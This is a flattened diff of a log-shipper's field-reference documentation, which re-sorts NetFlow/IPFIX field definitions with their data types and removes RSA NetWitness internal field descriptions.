-*`netflow.mpls_payload_packet_section`*:: +*`netflow.hash_output_range_min`*:: + -- -type: short +type: long -- -*`netflow.selector_id_total_pkts_observed`*:: +*`netflow.hash_selected_range_max`*:: + -- type: long -- -*`netflow.selector_id_total_pkts_selected`*:: +*`netflow.hash_selected_range_min`*:: + -- type: long -- -*`netflow.absolute_error`*:: +*`netflow.http_content_type`*:: + -- -type: double +type: keyword -- -*`netflow.relative_error`*:: +*`netflow.http_message_version`*:: + -- -type: double +type: keyword -- -*`netflow.observation_time_seconds`*:: +*`netflow.http_reason_phrase`*:: + -- -type: date +type: keyword -- -*`netflow.observation_time_milliseconds`*:: +*`netflow.http_request_host`*:: + -- -type: date +type: keyword -- -*`netflow.observation_time_microseconds`*:: +*`netflow.http_request_method`*:: + -- -type: date +type: keyword -- -*`netflow.observation_time_nanoseconds`*:: +*`netflow.http_request_target`*:: + -- -type: date +type: keyword -- -*`netflow.digest_hash_value`*:: +*`netflow.http_status_code`*:: + -- -type: long +type: integer -- -*`netflow.hash_ip_payload_offset`*:: +*`netflow.http_user_agent`*:: + -- -type: long +type: keyword -- -*`netflow.hash_ip_payload_size`*:: +*`netflow.icmp_code_ipv4`*:: + -- -type: long +type: short -- -*`netflow.hash_output_range_min`*:: +*`netflow.icmp_code_ipv6`*:: + -- -type: long +type: short -- -*`netflow.hash_output_range_max`*:: +*`netflow.icmp_type_code_ipv4`*:: + -- -type: long +type: integer -- -*`netflow.hash_selected_range_min`*:: +*`netflow.icmp_type_code_ipv6`*:: + -- -type: long +type: integer -- -*`netflow.hash_selected_range_max`*:: +*`netflow.icmp_type_ipv4`*:: + -- -type: long +type: short -- -*`netflow.hash_digest_output`*:: +*`netflow.icmp_type_ipv6`*:: + -- -type: boolean +type: short -- -*`netflow.hash_initialiser_value`*:: +*`netflow.igmp_type`*:: ++ +-- +type: short + +-- + +*`netflow.ignored_data_record_total_count`*:: + -- type: long -- -*`netflow.selector_name`*:: +*`netflow.ignored_layer2_frame_total_count`*:: + -- -type: keyword +type: long -- -*`netflow.upper_ci_limit`*:: +*`netflow.ignored_layer2_octet_total_count`*:: + -- -type: double +type: long -- -*`netflow.lower_ci_limit`*:: +*`netflow.ignored_octet_total_count`*:: + -- -type: double +type: long -- -*`netflow.confidence_level`*:: +*`netflow.ignored_packet_total_count`*:: + -- -type: double +type: long -- @@ -96563,6 +97154,20 @@ type: keyword -- +*`netflow.information_element_id`*:: ++ +-- +type: integer + +-- + +*`netflow.information_element_index`*:: ++ +-- +type: integer + +-- + *`netflow.information_element_name`*:: + -- @@ -96598,692 +97203,755 @@ type: integer -- -*`netflow.private_enterprise_number`*:: +*`netflow.ingress_broadcast_packet_total_count`*:: + -- type: long -- -*`netflow.virtual_station_interface_id`*:: +*`netflow.ingress_interface`*:: + -- -type: short +type: long -- -*`netflow.virtual_station_interface_name`*:: +*`netflow.ingress_interface_type`*:: + -- -type: keyword +type: long -- -*`netflow.virtual_station_uuid`*:: +*`netflow.ingress_multicast_packet_total_count`*:: + -- -type: short +type: long -- -*`netflow.virtual_station_name`*:: +*`netflow.ingress_physical_interface`*:: + -- -type: keyword +type: long -- -*`netflow.layer2_segment_id`*:: +*`netflow.ingress_unicast_packet_total_count`*:: + -- type: long -- -*`netflow.layer2_octet_delta_count`*:: +*`netflow.ingress_vrfid`*:: + -- type: long -- -*`netflow.layer2_octet_total_count`*:: +*`netflow.initial_tcp_flags`*:: + -- -type: long +type: short -- -*`netflow.ingress_unicast_packet_total_count`*:: +*`netflow.initiator_octets`*:: + -- type: long -- -*`netflow.ingress_multicast_packet_total_count`*:: +*`netflow.initiator_packets`*:: + -- type: long -- -*`netflow.ingress_broadcast_packet_total_count`*:: +*`netflow.interface_description`*:: + -- -type: long +type: keyword -- -*`netflow.egress_unicast_packet_total_count`*:: +*`netflow.interface_name`*:: + -- -type: long +type: keyword -- -*`netflow.egress_broadcast_packet_total_count`*:: +*`netflow.intermediate_process_id`*:: + -- type: long -- -*`netflow.monitoring_interval_start_milli_seconds`*:: +*`netflow.internal_address_realm`*:: + -- -type: date +type: short -- -*`netflow.monitoring_interval_end_milli_seconds`*:: +*`netflow.ip_class_of_service`*:: + -- -type: date +type: short -- -*`netflow.port_range_start`*:: +*`netflow.ip_diff_serv_code_point`*:: + -- -type: integer +type: short -- -*`netflow.port_range_end`*:: +*`netflow.ip_header_length`*:: + -- -type: integer +type: short -- -*`netflow.port_range_step_size`*:: +*`netflow.ip_header_packet_section`*:: + -- -type: integer +type: short -- -*`netflow.port_range_num_ports`*:: +*`netflow.ip_next_hop_ipv4_address`*:: + -- -type: integer +type: ip -- -*`netflow.sta_mac_address`*:: +*`netflow.ip_next_hop_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`netflow.sta_ipv4_address`*:: +*`netflow.ip_payload_length`*:: + -- -type: ip +type: long -- -*`netflow.wtp_mac_address`*:: +*`netflow.ip_payload_packet_section`*:: + -- -type: keyword +type: short -- -*`netflow.ingress_interface_type`*:: +*`netflow.ip_precedence`*:: ++ +-- +type: short + +-- + +*`netflow.ip_sec_spi`*:: + -- type: long -- -*`netflow.egress_interface_type`*:: +*`netflow.ip_total_length`*:: + -- type: long -- -*`netflow.rtp_sequence_number`*:: +*`netflow.ip_ttl`*:: + -- -type: integer +type: short -- -*`netflow.user_name`*:: +*`netflow.ip_version`*:: + -- -type: keyword +type: short -- -*`netflow.application_category_name`*:: +*`netflow.ipv4_ihl`*:: + -- -type: keyword +type: short -- -*`netflow.application_sub_category_name`*:: +*`netflow.ipv4_options`*:: + -- -type: keyword +type: long -- -*`netflow.application_group_name`*:: +*`netflow.ipv4_router_sc`*:: + -- -type: keyword +type: ip -- -*`netflow.original_flows_present`*:: +*`netflow.ipv6_extension_headers`*:: + -- type: long -- -*`netflow.original_flows_initiated`*:: +*`netflow.is_multicast`*:: + -- -type: long +type: short -- -*`netflow.original_flows_completed`*:: +*`netflow.ixia_browser_id`*:: + -- -type: long +type: short -- -*`netflow.distinct_count_of_source_ip_address`*:: +*`netflow.ixia_browser_name`*:: + -- -type: long +type: keyword -- -*`netflow.distinct_count_of_destination_ip_address`*:: +*`netflow.ixia_device_id`*:: + -- -type: long +type: short -- -*`netflow.distinct_count_of_source_ipv4_address`*:: +*`netflow.ixia_device_name`*:: + -- -type: long +type: keyword -- -*`netflow.distinct_count_of_destination_ipv4_address`*:: +*`netflow.ixia_dns_answer`*:: + -- -type: long +type: keyword -- -*`netflow.distinct_count_of_source_ipv6_address`*:: +*`netflow.ixia_dns_classes`*:: + -- -type: long +type: keyword -- -*`netflow.distinct_count_of_destination_ipv6_address`*:: +*`netflow.ixia_dns_query`*:: + -- -type: long +type: keyword -- -*`netflow.value_distribution_method`*:: +*`netflow.ixia_dns_record_txt`*:: + -- -type: short +type: keyword -- -*`netflow.rfc3550_jitter_milliseconds`*:: +*`netflow.ixia_dst_as_name`*:: + -- -type: long +type: keyword -- -*`netflow.rfc3550_jitter_microseconds`*:: +*`netflow.ixia_dst_city_name`*:: + -- -type: long +type: keyword -- -*`netflow.rfc3550_jitter_nanoseconds`*:: +*`netflow.ixia_dst_country_code`*:: + -- -type: long +type: keyword -- -*`netflow.dot1q_dei`*:: +*`netflow.ixia_dst_country_name`*:: + -- -type: boolean +type: keyword -- -*`netflow.dot1q_customer_dei`*:: +*`netflow.ixia_dst_latitude`*:: + -- -type: boolean +type: float -- -*`netflow.flow_selector_algorithm`*:: +*`netflow.ixia_dst_longitude`*:: + -- -type: integer +type: float -- -*`netflow.flow_selected_octet_delta_count`*:: +*`netflow.ixia_dst_region_code`*:: + -- -type: long +type: keyword -- -*`netflow.flow_selected_packet_delta_count`*:: +*`netflow.ixia_dst_region_node`*:: + -- -type: long +type: keyword -- -*`netflow.flow_selected_flow_delta_count`*:: +*`netflow.ixia_encrypt_cipher`*:: + -- -type: long +type: keyword -- -*`netflow.selector_id_total_flows_observed`*:: +*`netflow.ixia_encrypt_key_length`*:: + -- -type: long +type: integer -- -*`netflow.selector_id_total_flows_selected`*:: +*`netflow.ixia_encrypt_type`*:: + -- -type: long +type: keyword -- -*`netflow.sampling_flow_interval`*:: +*`netflow.ixia_http_host_name`*:: + -- -type: long +type: keyword -- -*`netflow.sampling_flow_spacing`*:: +*`netflow.ixia_http_uri`*:: + -- -type: long +type: keyword -- -*`netflow.flow_sampling_time_interval`*:: +*`netflow.ixia_http_user_agent`*:: + -- -type: long +type: keyword -- -*`netflow.flow_sampling_time_spacing`*:: +*`netflow.ixia_imsi_subscriber`*:: ++ +-- +type: keyword + +-- + +*`netflow.ixia_l7_app_id`*:: + -- type: long -- -*`netflow.hash_flow_domain`*:: +*`netflow.ixia_l7_app_name`*:: + -- -type: integer +type: keyword -- -*`netflow.transport_octet_delta_count`*:: +*`netflow.ixia_latency`*:: + -- type: long -- -*`netflow.transport_packet_delta_count`*:: +*`netflow.ixia_rev_octet_delta_count`*:: + -- type: long -- -*`netflow.original_exporter_ipv4_address`*:: +*`netflow.ixia_rev_packet_delta_count`*:: + -- -type: ip +type: long -- -*`netflow.original_exporter_ipv6_address`*:: +*`netflow.ixia_src_as_name`*:: + -- -type: ip +type: keyword -- -*`netflow.original_observation_domain_id`*:: +*`netflow.ixia_src_city_name`*:: + -- -type: long +type: keyword -- -*`netflow.intermediate_process_id`*:: +*`netflow.ixia_src_country_code`*:: + -- -type: long +type: keyword -- -*`netflow.ignored_data_record_total_count`*:: +*`netflow.ixia_src_country_name`*:: + -- -type: long +type: keyword -- -*`netflow.data_link_frame_type`*:: +*`netflow.ixia_src_latitude`*:: + -- -type: integer +type: float -- -*`netflow.section_offset`*:: +*`netflow.ixia_src_longitude`*:: + -- -type: integer +type: float -- -*`netflow.section_exported_octets`*:: +*`netflow.ixia_src_region_code`*:: + -- -type: integer +type: keyword -- -*`netflow.dot1q_service_instance_tag`*:: +*`netflow.ixia_src_region_name`*:: + -- -type: short +type: keyword -- -*`netflow.dot1q_service_instance_id`*:: +*`netflow.ixia_threat_ipv4`*:: + -- -type: long +type: ip -- -*`netflow.dot1q_service_instance_priority`*:: +*`netflow.ixia_threat_ipv6`*:: + -- -type: short +type: ip -- -*`netflow.dot1q_customer_source_mac_address`*:: +*`netflow.ixia_threat_type`*:: + -- type: keyword -- -*`netflow.dot1q_customer_destination_mac_address`*:: +*`netflow.large_packet_count`*:: + -- -type: keyword +type: long -- -*`netflow.post_layer2_octet_delta_count`*:: +*`netflow.layer2_frame_delta_count`*:: + -- type: long -- -*`netflow.post_mcast_layer2_octet_delta_count`*:: +*`netflow.layer2_frame_total_count`*:: + -- type: long -- -*`netflow.post_layer2_octet_total_count`*:: +*`netflow.layer2_octet_delta_count`*:: + -- type: long -- -*`netflow.post_mcast_layer2_octet_total_count`*:: +*`netflow.layer2_octet_delta_sum_of_squares`*:: + -- type: long -- -*`netflow.minimum_layer2_total_length`*:: +*`netflow.layer2_octet_total_count`*:: + -- type: long -- -*`netflow.maximum_layer2_total_length`*:: +*`netflow.layer2_octet_total_sum_of_squares`*:: + -- type: long -- -*`netflow.dropped_layer2_octet_delta_count`*:: +*`netflow.layer2_segment_id`*:: + -- type: long -- -*`netflow.dropped_layer2_octet_total_count`*:: +*`netflow.layer2packet_section_data`*:: + -- -type: long +type: short -- -*`netflow.ignored_layer2_octet_total_count`*:: +*`netflow.layer2packet_section_offset`*:: + -- -type: long +type: integer -- -*`netflow.not_sent_layer2_octet_total_count`*:: +*`netflow.layer2packet_section_size`*:: + -- -type: long +type: integer -- -*`netflow.layer2_octet_delta_sum_of_squares`*:: +*`netflow.line_card_id`*:: + -- type: long -- -*`netflow.layer2_octet_total_sum_of_squares`*:: +*`netflow.log_op`*:: ++ +-- +type: short + +-- + +*`netflow.lower_ci_limit`*:: ++ +-- +type: double + +-- + +*`netflow.mark`*:: + -- type: long -- -*`netflow.layer2_frame_delta_count`*:: +*`netflow.max_bib_entries`*:: + -- type: long -- -*`netflow.layer2_frame_total_count`*:: +*`netflow.max_entries_per_user`*:: + -- type: long -- -*`netflow.pseudo_wire_destination_ipv4_address`*:: +*`netflow.max_export_seconds`*:: + -- -type: ip +type: date -- -*`netflow.ignored_layer2_frame_total_count`*:: +*`netflow.max_flow_end_microseconds`*:: + -- -type: long +type: date -- -*`netflow.mib_object_value_integer`*:: +*`netflow.max_flow_end_milliseconds`*:: + -- -type: integer +type: date -- -*`netflow.mib_object_value_octet_string`*:: +*`netflow.max_flow_end_nanoseconds`*:: + -- -type: short +type: date -- -*`netflow.mib_object_value_oid`*:: +*`netflow.max_flow_end_seconds`*:: + -- -type: short +type: date -- -*`netflow.mib_object_value_bits`*:: +*`netflow.max_fragments_pending_reassembly`*:: + -- -type: short +type: long -- -*`netflow.mib_object_value_ip_address`*:: +*`netflow.max_packet_size`*:: + -- -type: ip +type: integer -- -*`netflow.mib_object_value_counter`*:: +*`netflow.max_session_entries`*:: + -- type: long -- -*`netflow.mib_object_value_gauge`*:: +*`netflow.max_subscribers`*:: + -- type: long -- -*`netflow.mib_object_value_time_ticks`*:: +*`netflow.maximum_ip_total_length`*:: + -- type: long -- -*`netflow.mib_object_value_unsigned`*:: +*`netflow.maximum_layer2_total_length`*:: + -- type: long -- -*`netflow.mib_object_identifier`*:: +*`netflow.maximum_ttl`*:: + -- type: short -- -*`netflow.mib_sub_identifier`*:: +*`netflow.mean_flow_rate`*:: + -- type: long -- -*`netflow.mib_index_indicator`*:: +*`netflow.mean_packet_rate`*:: + -- type: long -- +*`netflow.message_md5_checksum`*:: ++ +-- +type: short + +-- + +*`netflow.message_scope`*:: ++ +-- +type: short + +-- + +*`netflow.metering_process_id`*:: ++ +-- +type: long + +-- + +*`netflow.metro_evc_id`*:: ++ +-- +type: keyword + +-- + +*`netflow.metro_evc_type`*:: ++ +-- +type: short + +-- + *`netflow.mib_capture_time_semantics`*:: + -- @@ -97305,8677 +97973,7099 @@ type: keyword -- -*`netflow.mib_object_name`*:: +*`netflow.mib_index_indicator`*:: + -- -type: keyword +type: long -- -*`netflow.mib_object_description`*:: +*`netflow.mib_module_name`*:: + -- type: keyword -- -*`netflow.mib_object_syntax`*:: +*`netflow.mib_object_description`*:: + -- type: keyword -- -*`netflow.mib_module_name`*:: +*`netflow.mib_object_identifier`*:: + -- -type: keyword +type: short -- -*`netflow.mobile_imsi`*:: +*`netflow.mib_object_name`*:: + -- type: keyword -- -*`netflow.mobile_msisdn`*:: +*`netflow.mib_object_syntax`*:: + -- type: keyword -- -*`netflow.http_status_code`*:: +*`netflow.mib_object_value_bits`*:: + -- -type: integer +type: short -- -*`netflow.source_transport_ports_limit`*:: +*`netflow.mib_object_value_counter`*:: + -- -type: integer +type: long -- -*`netflow.http_request_method`*:: +*`netflow.mib_object_value_gauge`*:: + -- -type: keyword +type: long -- -*`netflow.http_request_host`*:: +*`netflow.mib_object_value_integer`*:: + -- -type: keyword +type: integer -- -*`netflow.http_request_target`*:: +*`netflow.mib_object_value_ip_address`*:: + -- -type: keyword +type: ip -- -*`netflow.http_message_version`*:: +*`netflow.mib_object_value_octet_string`*:: + -- -type: keyword +type: short -- -*`netflow.nat_instance_id`*:: +*`netflow.mib_object_value_oid`*:: + -- -type: long +type: short -- -*`netflow.internal_address_realm`*:: +*`netflow.mib_object_value_time_ticks`*:: + -- -type: short +type: long -- -*`netflow.external_address_realm`*:: +*`netflow.mib_object_value_unsigned`*:: + -- -type: short +type: long -- -*`netflow.nat_quota_exceeded_event`*:: +*`netflow.mib_sub_identifier`*:: + -- type: long -- -*`netflow.nat_threshold_event`*:: +*`netflow.min_export_seconds`*:: + -- -type: long +type: date -- -*`netflow.http_user_agent`*:: +*`netflow.min_flow_start_microseconds`*:: + -- -type: keyword +type: date -- -*`netflow.http_content_type`*:: +*`netflow.min_flow_start_milliseconds`*:: + -- -type: keyword +type: date -- -*`netflow.http_reason_phrase`*:: +*`netflow.min_flow_start_nanoseconds`*:: + -- -type: keyword +type: date -- -*`netflow.max_session_entries`*:: +*`netflow.min_flow_start_seconds`*:: + -- -type: long +type: date -- -*`netflow.max_bib_entries`*:: +*`netflow.minimum_ip_total_length`*:: + -- type: long -- -*`netflow.max_entries_per_user`*:: +*`netflow.minimum_layer2_total_length`*:: + -- type: long -- -*`netflow.max_subscribers`*:: +*`netflow.minimum_ttl`*:: + -- -type: long +type: short -- -*`netflow.max_fragments_pending_reassembly`*:: +*`netflow.mobile_imsi`*:: + -- -type: long +type: keyword -- -*`netflow.address_pool_high_threshold`*:: +*`netflow.mobile_msisdn`*:: + -- -type: long +type: keyword -- -*`netflow.address_pool_low_threshold`*:: +*`netflow.monitoring_interval_end_milli_seconds`*:: + -- -type: long +type: date -- -*`netflow.address_port_mapping_high_threshold`*:: +*`netflow.monitoring_interval_start_milli_seconds`*:: + -- -type: long +type: date -- -*`netflow.address_port_mapping_low_threshold`*:: +*`netflow.mpls_label_stack_depth`*:: + -- type: long -- -*`netflow.address_port_mapping_per_user_high_threshold`*:: +*`netflow.mpls_label_stack_length`*:: + -- type: long -- -*`netflow.global_address_mapping_high_threshold`*:: +*`netflow.mpls_label_stack_section`*:: + -- -type: long +type: short -- -*`netflow.vpn_identifier`*:: +*`netflow.mpls_label_stack_section10`*:: + -- type: short -- -[[exported-fields-netscout]] -== Arbor Peakflow SP fields - -netscout fields. - - - -*`network.interface.name`*:: +*`netflow.mpls_label_stack_section2`*:: + -- -Name of the network interface where the traffic has been observed. - - -type: keyword +type: short -- - - -*`rsa.internal.msg`*:: +*`netflow.mpls_label_stack_section3`*:: + -- -This key is used to capture the raw message that comes into the Log Decoder - -type: keyword +type: short -- -*`rsa.internal.messageid`*:: +*`netflow.mpls_label_stack_section4`*:: + -- -type: keyword +type: short -- -*`rsa.internal.event_desc`*:: +*`netflow.mpls_label_stack_section5`*:: + -- -type: keyword +type: short -- -*`rsa.internal.message`*:: +*`netflow.mpls_label_stack_section6`*:: + -- -This key captures the contents of instant messages - -type: keyword +type: short -- -*`rsa.internal.time`*:: +*`netflow.mpls_label_stack_section7`*:: + -- -This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. - -type: date +type: short -- -*`rsa.internal.level`*:: +*`netflow.mpls_label_stack_section8`*:: + -- -Deprecated key defined only in table map. - -type: long +type: short -- -*`rsa.internal.msg_id`*:: +*`netflow.mpls_label_stack_section9`*:: + -- -This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: short -- -*`rsa.internal.msg_vid`*:: +*`netflow.mpls_payload_length`*:: + -- -This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: long -- -*`rsa.internal.data`*:: +*`netflow.mpls_payload_packet_section`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.obj_server`*:: +*`netflow.mpls_top_label_exp`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.obj_val`*:: +*`netflow.mpls_top_label_ipv4_address`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: ip -- -*`rsa.internal.resource`*:: +*`netflow.mpls_top_label_ipv6_address`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: ip -- -*`rsa.internal.obj_id`*:: +*`netflow.mpls_top_label_prefix_length`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.statement`*:: +*`netflow.mpls_top_label_stack_section`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.audit_class`*:: +*`netflow.mpls_top_label_ttl`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.entry`*:: +*`netflow.mpls_top_label_type`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.hcode`*:: +*`netflow.mpls_vpn_route_distinguisher`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.inode`*:: +*`netflow.mptcp_address_id`*:: + -- -Deprecated key defined only in table map. - -type: long +type: short -- -*`rsa.internal.resource_class`*:: +*`netflow.mptcp_flags`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: short -- -*`rsa.internal.dead`*:: +*`netflow.mptcp_initial_data_sequence_number`*:: + -- -Deprecated key defined only in table map. - type: long -- -*`rsa.internal.feed_desc`*:: +*`netflow.mptcp_maximum_segment_size`*:: + -- -This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: integer -- -*`rsa.internal.feed_name`*:: +*`netflow.mptcp_receiver_token`*:: + -- -This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: long -- -*`rsa.internal.cid`*:: +*`netflow.multicast_replication_factor`*:: + -- -This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: long -- -*`rsa.internal.device_class`*:: +*`netflow.nat_event`*:: + -- -This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: short -- -*`rsa.internal.device_group`*:: +*`netflow.nat_inside_svcid`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: integer -- -*`rsa.internal.device_host`*:: +*`netflow.nat_instance_id`*:: + -- -This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: long -- -*`rsa.internal.device_ip`*:: +*`netflow.nat_originating_address_realm`*:: + -- -This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: short -- -*`rsa.internal.device_ipv6`*:: +*`netflow.nat_outside_svcid`*:: + -- -This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: integer -- -*`rsa.internal.device_type`*:: +*`netflow.nat_pool_id`*:: + -- -This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +type: long + +-- +*`netflow.nat_pool_name`*:: ++ +-- type: keyword -- -*`rsa.internal.device_type_id`*:: +*`netflow.nat_quota_exceeded_event`*:: + -- -Deprecated key defined only in table map. - type: long -- -*`rsa.internal.did`*:: +*`netflow.nat_sub_string`*:: + -- -This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.entropy_req`*:: +*`netflow.nat_threshold_event`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - type: long -- -*`rsa.internal.entropy_res`*:: +*`netflow.nat_type`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long +type: short -- -*`rsa.internal.event_name`*:: +*`netflow.netscale_ica_client_version`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.feed_category`*:: +*`netflow.netscaler_aaa_username`*:: + -- -This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.forward_ip`*:: +*`netflow.netscaler_app_name`*:: + -- -This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. - -type: ip +type: keyword -- -*`rsa.internal.forward_ipv6`*:: +*`netflow.netscaler_app_name_app_id`*:: + -- -This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: long -- -*`rsa.internal.header_id`*:: +*`netflow.netscaler_app_name_incarnation_number`*:: + -- -This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: long -- -*`rsa.internal.lc_cid`*:: +*`netflow.netscaler_app_template_name`*:: + -- -This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_ctime`*:: -+ --- -This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: date - --- - -*`rsa.internal.mcb_req`*:: +*`netflow.netscaler_app_unit_name_app_id`*:: + -- -This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most - type: long -- -*`rsa.internal.mcb_res`*:: +*`netflow.netscaler_application_startup_duration`*:: + -- -This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most - type: long -- -*`rsa.internal.mcbc_req`*:: +*`netflow.netscaler_application_startup_time`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - type: long -- -*`rsa.internal.mcbc_res`*:: +*`netflow.netscaler_cache_redir_client_connection_core_id`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - type: long -- -*`rsa.internal.medium`*:: +*`netflow.netscaler_cache_redir_client_connection_transaction_id`*:: + -- -This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session - type: long -- -*`rsa.internal.node_name`*:: +*`netflow.netscaler_client_rtt`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: long -- -*`rsa.internal.nwe_callback_id`*:: +*`netflow.netscaler_connection_chain_hop_count`*:: + -- -This key denotes that event is endpoint related - -type: keyword +type: long -- -*`rsa.internal.parse_error`*:: +*`netflow.netscaler_connection_chain_id`*:: + -- -This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: short -- -*`rsa.internal.payload_req`*:: +*`netflow.netscaler_connection_id`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - type: long -- -*`rsa.internal.payload_res`*:: +*`netflow.netscaler_current_license_consumed`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - type: long -- -*`rsa.internal.process_vid_dst`*:: +*`netflow.netscaler_db_clt_host_name`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. - type: keyword -- -*`rsa.internal.process_vid_src`*:: +*`netflow.netscaler_db_database_name`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. - type: keyword -- -*`rsa.internal.rid`*:: +*`netflow.netscaler_db_login_flags`*:: + -- -This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: long -- -*`rsa.internal.session_split`*:: +*`netflow.netscaler_db_protocol_name`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: short -- -*`rsa.internal.site`*:: +*`netflow.netscaler_db_req_string`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.size`*:: +*`netflow.netscaler_db_req_type`*:: + -- -This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: short -- -*`rsa.internal.sourcefile`*:: +*`netflow.netscaler_db_resp_length`*:: + -- -This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: keyword +type: long -- -*`rsa.internal.ubc_req`*:: +*`netflow.netscaler_db_resp_status`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - type: long -- -*`rsa.internal.ubc_res`*:: +*`netflow.netscaler_db_resp_status_string`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.word`*:: +*`netflow.netscaler_db_user_name`*:: + -- -This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log - type: keyword -- - -*`rsa.time.event_time`*:: +*`netflow.netscaler_flow_flags`*:: + -- -This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form - -type: date +type: long -- -*`rsa.time.duration_time`*:: +*`netflow.netscaler_http_client_interaction_end_time`*:: + -- -This key is used to capture the normalized duration/lifetime in seconds. - -type: double +type: keyword -- -*`rsa.time.event_time_str`*:: +*`netflow.netscaler_http_client_interaction_start_time`*:: + -- -This key is used to capture the incomplete time mentioned in a session as a string - type: keyword -- -*`rsa.time.starttime`*:: +*`netflow.netscaler_http_client_render_end_time`*:: + -- -This key is used to capture the Start time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.month`*:: +*`netflow.netscaler_http_client_render_start_time`*:: + -- type: keyword -- -*`rsa.time.day`*:: +*`netflow.netscaler_http_content_type`*:: + -- type: keyword -- -*`rsa.time.endtime`*:: 